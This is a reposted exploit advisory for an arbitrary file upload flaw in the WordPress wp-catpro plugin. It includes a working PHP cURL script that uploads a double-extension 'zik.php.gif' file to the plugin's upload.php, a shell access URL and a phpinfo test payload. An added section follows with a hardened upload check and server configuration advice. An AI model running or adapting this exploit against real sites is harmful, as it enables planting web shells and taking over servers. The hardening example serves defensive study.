Source: 自学PHP网 (www.zixuephp.com)  Date: 2015-04-17 11:59
#-----------------------------------------------------------------------
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
Author => Zikou-16
Email => zikou16x@gmail.com
Tested on : Windows 7 , Backtrack 5r3
####
#=> Exploit info:
------------------
# An attacker can upload file/shell.php.gif: the extension check in upload.php only sees
# the trailing "gif", and the file-name character class quoted below allows dots, so a
# double extension passes. Whether the file then executes depends on the web server:
# Apache's mod_mime evaluates every dot-separated extension, so with an AddHandler for
# .php a file named shell.php.gif is run as PHP.
# ("jpg", "gif", "png") // Allowed file extensions
# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
#=> Exploit
-----------
<?php
// File to upload: PHP code with a .gif suffix, so upload.php's extension check
// sees "gif" while the server still handles it as PHP (see the info above).
$uploadfile = "zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
// "@file" is the pre-5.5 cURL upload syntax; PHP >= 5.5 needs CURLFile.
$file = class_exists('CURLFile') ? new CURLFile($uploadfile) : "@$uploadfile";
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('Filedata' => $file,
          'folder'   => '/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://[ www.2cto.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
Payload (contents of zik.php.gif, used to confirm execution):
<?php
phpinfo();
?>
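The check behind this, as an added example that is not the wp-catpro plugin's code and not the advisory author's: the vulnerable handler is modelled on the assumption that it tests only the part after the last dot against the "jpg", "gif", "png" list (the quoted configuration above does not show the check itself). Next to it is a hardened handler that rejects double extensions, verifies the image magic bytes and assigns a server-chosen name. The function names and sample inputs are constructed for this example.

```php
<?php
// Added example for this advisory; not the wp-catpro plugin's code.
// Assumption: the vulnerable handler checks only the extension after the
// last dot against the allowlist and keeps the client-supplied file name.

const ALLOWED_EXT = ['jpg', 'gif', 'png'];

// Vulnerable shape: only the last extension is examined, and the character
// allowlist quoted in the advisory permits dots, so "zik.php.gif" passes.
function vulnerable_check(string $name): bool
{
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    return in_array($ext, ALLOWED_EXT, true);
}

// Hardened: exactly one extension, the body must start with the matching
// image magic bytes, and the stored name is chosen by the server.
// Returns the server-side file name on success, null on rejection.
function hardened_check(string $clientName, string $contents): ?string
{
    $base = basename($clientName);
    // One stem, one dot, one allowlisted extension. Rejects "shell.php.gif",
    // "shell.gif.php" and anything with path separators or odd characters.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}\.(jpg|gif|png)$/i', $base, $m)) {
        return null;
    }
    $ext = strtolower($m[1]);

    // Magic-byte check: the content must look like the type it claims.
    $magic = [
        'gif' => ["GIF87a", "GIF89a"],
        'png' => ["\x89PNG\r\n\x1a\n"],
        'jpg' => ["\xFF\xD8\xFF"],
    ];
    $ok = false;
    foreach ($magic[$ext] as $sig) {
        if (strncmp($contents, $sig, strlen($sig)) === 0) {
            $ok = true;
            break;
        }
    }
    if (!$ok) {
        return null;
    }

    // Random server-chosen name with the allowlisted extension, so nothing
    // the client sent reaches the file system path or the resulting URL.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample inputs: the advisory's double-extension name, the
// reversed order, and a plain .gif name; the body is a GIF/PHP polyglot
// that satisfies the magic-byte check.
function demo(): void
{
    $polyglot = "GIF89a<?php phpinfo(); ?>";

    foreach (['zik.php.gif', 'zik.gif.php', 'zik.gif'] as $name) {
        $v = vulnerable_check($name) ? 'accepted' : 'rejected';
        $h = hardened_check($name, $polyglot);
        printf("%-12s vulnerable: %-8s hardened: %s\n",
            $name, $v, $h === null ? 'rejected' : "stored as $h");
    }
}

demo();
```

The hardened check closes the double-extension path, but note that the polyglot body is still stored under a .gif name: a magic-byte check cannot tell an image from an image with PHP appended. The upload directory therefore also has to be served without script execution (keep it outside the web root, or configure the server so that nothing in it is handed to the PHP handler); the file-name check alone is not the whole fix.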